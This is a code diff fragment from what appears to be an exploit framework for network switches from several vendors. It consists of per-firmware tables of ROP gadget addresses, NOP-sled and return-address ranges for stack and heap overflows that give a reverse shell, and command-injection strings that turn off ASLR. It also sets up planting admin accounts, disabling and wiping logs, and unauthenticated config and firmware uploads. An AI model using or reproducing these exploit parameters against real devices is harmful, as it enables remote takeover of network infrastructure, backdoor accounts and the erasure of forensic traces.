+						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
+						'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',
+						'START':0x7fff7004,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 28,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 20,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# OpenMESH (some identical with enginius egs series)
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : Yes
+			# Del /mntlog/flash.log  : Yes
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'13984-12788': {
+				'template':'OpenMESH',						# Static for the vendor
+				'version':'01.03.24_180823-1626',					# Version / binary dependent stuff
+				'model':'OMS24',				# Model
+				'uri':'https://www.openmesh.com/',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E12C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99851c,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x248405a0,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+														# /sqfs/home/web/cgi/set.cgi;  cgi_sys_acctAdd_set()
+						'address':0x424890,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',			# Admin, priv 15
+						'vulnerable': True,
+					},
+					'stack_cgi_del_account': {
+														# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
+						'address':0x424890,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&na=USERNAME&pw=&pv=0&op=0',		# 
+						'vulnerable': True,				# user
+					},
+					'stack_cgi_diag': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_ipv4PingSet()
+						#'web_sys_ping_post':0x42341C,	# Jump one after 'sw $ra'			# (address, binary dependent)
+
+														# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()
+						'sys_ping_post_cmd':'&ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space #&mh=30&uid=0',
+						'sys_ping_post_check':'&ip=127.0.0.1 ; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
+						'verify_uri':'/conf_tmp/check',
+						'web_sys_ping_post': 0x424248,	# Jump one after 'sw $ra'			# (address, binary dependent)
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
+						'log_settings_set':0x43EA88,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
+						'log_ramClear':0x440660,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
+						'log_fileClear':0x440660,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
+						'sys_timeSntp_set':0x425260,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
+						'sys_timeSntpDel_set':0x425260,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
+						'sys_timeSettings_set':0x425260,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'security.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
+						'START':0x100181A0,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x104006A0,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 987,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 69,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# Xhome (identical with Realtek)
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : No
+			# Del /mntlog/flash.log  : No
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'222-64895': {
+				'template':'Xhome',					# Static for the vendor
+				'version':'3.0.0.43126',			# Version / binary dependent stuff
+				'model':'DownLoop-G24M',			# Model
+				'uri':'http://www.xhome.com.tw/product_info.php?info=p116_XHome-DownLoop-G24M----------------------------------------.html',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E6DC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x24841ea8,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_diag': {
+						# Ping IPv4
+						'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
+						'verify_uri':'/tmp/pingtest_tmp',
+						'web_sys_ping_post':0x4229A0,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()
+
+						# traceroute
+						#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',
+						#'verify_uri':'/tmp/traceroute_tmp',
+						#'web_sys_ping_post':0x423188,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()
+						'vulnerable': True,
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
+						'log_settings_set':0x481988,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_ramClear':0x4847FC,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_fileClear':0x4847FC,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+					'stack_cgi_sntp': {
+						'sys_timeSntp_set':0x42C910,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntpDel_set':0x42C910,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
+						'sys_timeSettings_set':0x42B6F8,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
+						'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',
+						'START':0x7fff7004,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 28,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 20,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# Pakedgedevice & Software
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : Yes
+			# Del /mntlog/flash.log  : Yes
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'225-21785': {
+				'model':'SX-8P',
+				'template':'Pakedge',					# Static for the vendor
+				'version':'1.04',							# Version / binary dependent stuff
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40C86C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f998538,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x248492ec,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_diag': {
+						'vulnerable': False,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
+						'log_settings_set':0x413AEC,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
+						'log_ramClear':0x413A14,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
+						'log_fileClear':0x413A14,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntp_set':0x4108E4,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntpDel_set':0x4108E4,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSettings_set':0x4108E4,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
+						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
+						'align': 3,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# Draytek
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : Yes
+			# Del /mntlog/flash.log  : Yes
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'752-95168': {
+				'template':'DrayTek',					# Static for the vendor
+				'version':'2.1.4',						# Version / binary dependent stuff
+				'model':'VigorSwitch P1100',  			#
+				'uri':'https://www.draytek.com/products/vigorswitch-p1100/',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40C67C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99852c,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x248490ac,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_diag': {
+						'vulnerable': False,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
+						'log_settings_set':0x413E34,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
+						'log_ramClear':0x413D64,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
+						'log_fileClear':0x413D64,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntp_set':0x410CA8,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntpDel_set':0x410CA8,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSettings_set':0x410CA8,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,				# 
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
+						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
+						'align': 3,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# Cerio
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : Yes
+			# Del /mntlog/flash.log  : Yes
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'224-5061': {
+				'template':'Cerio',					# Static for the vendor
+				'version':'1.00.29',				# Version / binary dependent stuff
+				'model':'CS-2424G-24P',  			#
+				'uri':'https://www.cerio.com.tw/eng/switch/poe-switch/cs-2424g-24p/',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E6DC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f998524,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x248411bc,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_diag': {
+														# /sqfs/home/web/cgi/set.cgi;  cgi_diag_traceroute_set()
+						'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
+						'sys_ping_post_check':'',
+						'web_sys_ping_post':0x40E114,	# Jump one after 'sw $ra'			# (address, binary dependent)
+
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
+						'log_settings_set':0x41DB4C,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
+						'log_ramClear':0x41DA94,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
+						'log_fileClear':0x41DA94,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntp_set':0x415F14,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntpDel_set':0x415F14,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSettings_set':0x415F14,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': False,			# 
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
+						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
+						'align': 3,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# Abaniact
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : No
+			# Del /mntlog/flash.log  : No
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'222-45866': {
+				'template':'Abaniact',					# Static for the vendor
+				'version':'116B00033',				# Version / binary dependent stuff
+				'model':'AML2-PS16-17GP L2',			# Model
+				'uri':'https://www.abaniact.com/L2SW/',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E65C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f998524,			# la $t9, system) # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x2484152c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_diag': {
+						# Ping IPv4
+						#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
+						#'verify_uri':'/tmp/pingtest_tmp',
+						#'web_sys_ping_post':0x4296FC,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()
+
+						# traceroute
+						'web_sys_ping_post':0x429F58,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()
+						'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',
+						'verify_uri':'/tmp/traceroute_tmp',
+						'vulnerable': True,
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
+						'log_settings_set':0x4B4FE4,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_ramClear':0x4BA5D0,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_fileClear':0x4BA5D0,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+					'stack_cgi_sntp': {
+						'sys_timeSntp_set':0x43764C,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntpDel_set':0x43764C,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
+						'sys_timeSettings_set':0x431CC4,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': False,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
+						'query':'username=admin&password=_PWDNOP_RA_START&login=1&shellcod=_USRNOP_USRNOP_USRNOP_SHELLCODE',
+						'START':0x7ffe6e04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'usr_nop': 53,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 45,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'vulnerable': True,
+						'workaround':True,	# My LAB workaround
+
+					},
+				},
+			},
+
+			#
+			# TG-NET Botone Technology Co.,Ltd.
+			# (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology)
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : No
+			# Del /mntlog/flash.log  : No
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'222-81176': {
+				'template':'TG-NET',					# Static for the vendor
+				'version':'3.1.1-R1',					# Version / binary dependent stuff
+				'model':'P3026M-24POE (V3)',				# Model
+				'uri':'http://www.tg-net.net/productshow.asp?ProdNum=1049&parentid=98',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40C74C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x2484a2d4,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_diag': {
+						'vulnerable': False,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
+						'log_settings_set':0x46AC10,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_ramClear':0x46E368,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_fileClear':0x46E368,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntp_set':0x42243C,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntpDel_set':0x42243C,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
+						'sys_timeSettings_set':0x424DE0,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+
+						'vulnerable':False,
+					}, 
+
+					# Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),
+					# and to fill wider area with sending '&%8f%84%01=%8f%84%80%18' where:
+					# 
+					# NOP's
+					# '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00
+					# '%24%04%FF%FF' : li $a0, 0xFFFFFFFF
+					'heack_cgi_shell': {
+						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
+						'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) +'_SHELLCODE',
+						'START':0x10010104,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP' :0x10600604,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 28,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 20,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+		}
+
+		#
+		# Vendor templates, Vendor_ETag() will be merged to here
+		# (dont delete anything here thats not moved to Vendor_ETag())
+		#
+
+		Vendor_Template = {
+			#
+			'Planet': {
+				'vendor': 'PLANET Technology Corp.',
+				'modulus_uri':'',
+				'info_leak':False,
+				'info_leak_JSON':False,
+				'info_leak_uri':'',
+				'xsid':False,
+				'xsid_uri':'',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':False,
+					'encryption':'clear',
+					'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+					'query':'username=USERNAME&password=PASSWORD&login=1',
+					'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
+					'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':False,
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'LOGGING_SERVICE=0&cmd=5121',
+						'status':'',
+						'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logfile_query':'cmd_5132=Clear+file+messages',
+						'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logmem_query':'cmd_5132=Clear+buffered+messages',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': {
+						'httpuploadbakcfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadbakcfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadruncfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httprestorecfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':'Image Signature Error',
+							'vulnerable': True,
+							'safe': True
+						},
+						'dispatcher.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'response':'502',
+							'Content-Type':False,
+							'authenticated': False,
+							'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'json':False,
+						'authenticated': False,
+						'encryption':'md5',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
+						#'encryption':'nopassword',
